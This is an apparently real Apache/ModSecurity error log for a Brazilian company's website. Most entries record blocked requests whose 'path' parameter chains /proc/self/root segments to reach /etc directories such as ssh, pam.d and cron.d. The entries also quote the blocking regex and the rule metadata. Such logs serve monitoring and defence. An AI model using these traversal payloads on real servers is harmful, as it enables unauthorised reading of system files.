[Thu Mar 19 10:18:31.598198 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.243.128:51376] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3pwkwaGbbGflqUZC7XAAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:18:35.667881 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:51386] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3q_u8EFLIOrSqIpugywAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:18:39.435248 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:51732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3r9a6ubjKNq_cu4ZM6QAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:18:43.846985 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:51738] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3s-oXxyEfFpUF8f8KkQAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:18:49.131113 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:51742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3uda6ubjKNq_cu4ZM8AAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:18:50.831255 2026] [:error] [pid 27293:tid 140411716749056] [client 74.7.228.61:54290] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abv3uv-YZRR_7pZ7nDKH1wAAA8M"]
[Thu Mar 19 10:18:55.793268 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:44928] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3v9a6ubjKNq_cu4ZM-AAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:18:56.085791 2026] [proxy_fcgi:error] [pid 14269:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:55104] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:19:02.754005 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.243.128:41024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3xv-YZRR_7pZ7nDKH2QAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:19:11.355582 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:37416] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3z-oXxyEfFpUF8f8KpAAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:19:21.166982 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:59900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv32cdf6f5d65gmYZRyMQAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:19:23.128674 2026] [proxy_fcgi:error] [pid 19093:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:55680] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:19:32.838920 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:39210] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv35Pu8EFLIOrSqIpug7gAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:19:47.261819 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:40002] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv389a6ubjKNq_cu4ZNDwAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:19:54.088248 2026] [mime_magic:error] [pid 27293:tid 140411574073088] (70014)End of file found: [client 57.141.18.51:58304] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:19:54.737800 2026] [proxy_fcgi:error] [pid 31803:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:56298] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:20:00.747133 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.243.128:49302] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4APu8EFLIOrSqIpug_AAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:20:13.387159 2026] [:error] [pid 27293:tid 140411708356352] [client 74.7.243.128:59596] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4Df-YZRR_7pZ7nDKH7gAAA8Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:20:24.157772 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:56912] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:20:25.031847 2026] [:error] [pid 27293:tid 140411548894976] [client 74.7.243.128:44194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4Gf-YZRR_7pZ7nDKH9wAAA9c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:20:33.571387 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:50444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4IQkwaGbbGflqUZC7tQAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:20:40.159064 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:43022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4KPu8EFLIOrSqIpuhGwAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:20:40.362410 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.244.43:38648] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abv4KOoXxyEfFpUF8f8KyAAAAUs"]
[Thu Mar 19 10:20:45.386152 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.243.128:43028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4Lcdf6f5d65gmYZRyVgAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:20:49.575563 2026] [:error] [pid 27403:tid 140411725141760] [client 74.7.243.128:43016] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4MRkFeYa1D6dYQnDsWQAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:20:52.137795 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:57646] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:20:53.536552 2026] [:error] [pid 19093:tid 140411565680384] [client 74.7.243.128:43018] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4NV_V7PWP6ixUYl64ZwAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:20:57.111521 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:43034] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4Oda6ubjKNq_cu4ZNPAAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:21:01.268992 2026] [:error] [pid 27403:tid 140411632822016] [client 74.7.243.128:33656] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4PRkFeYa1D6dYQnDsWwAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
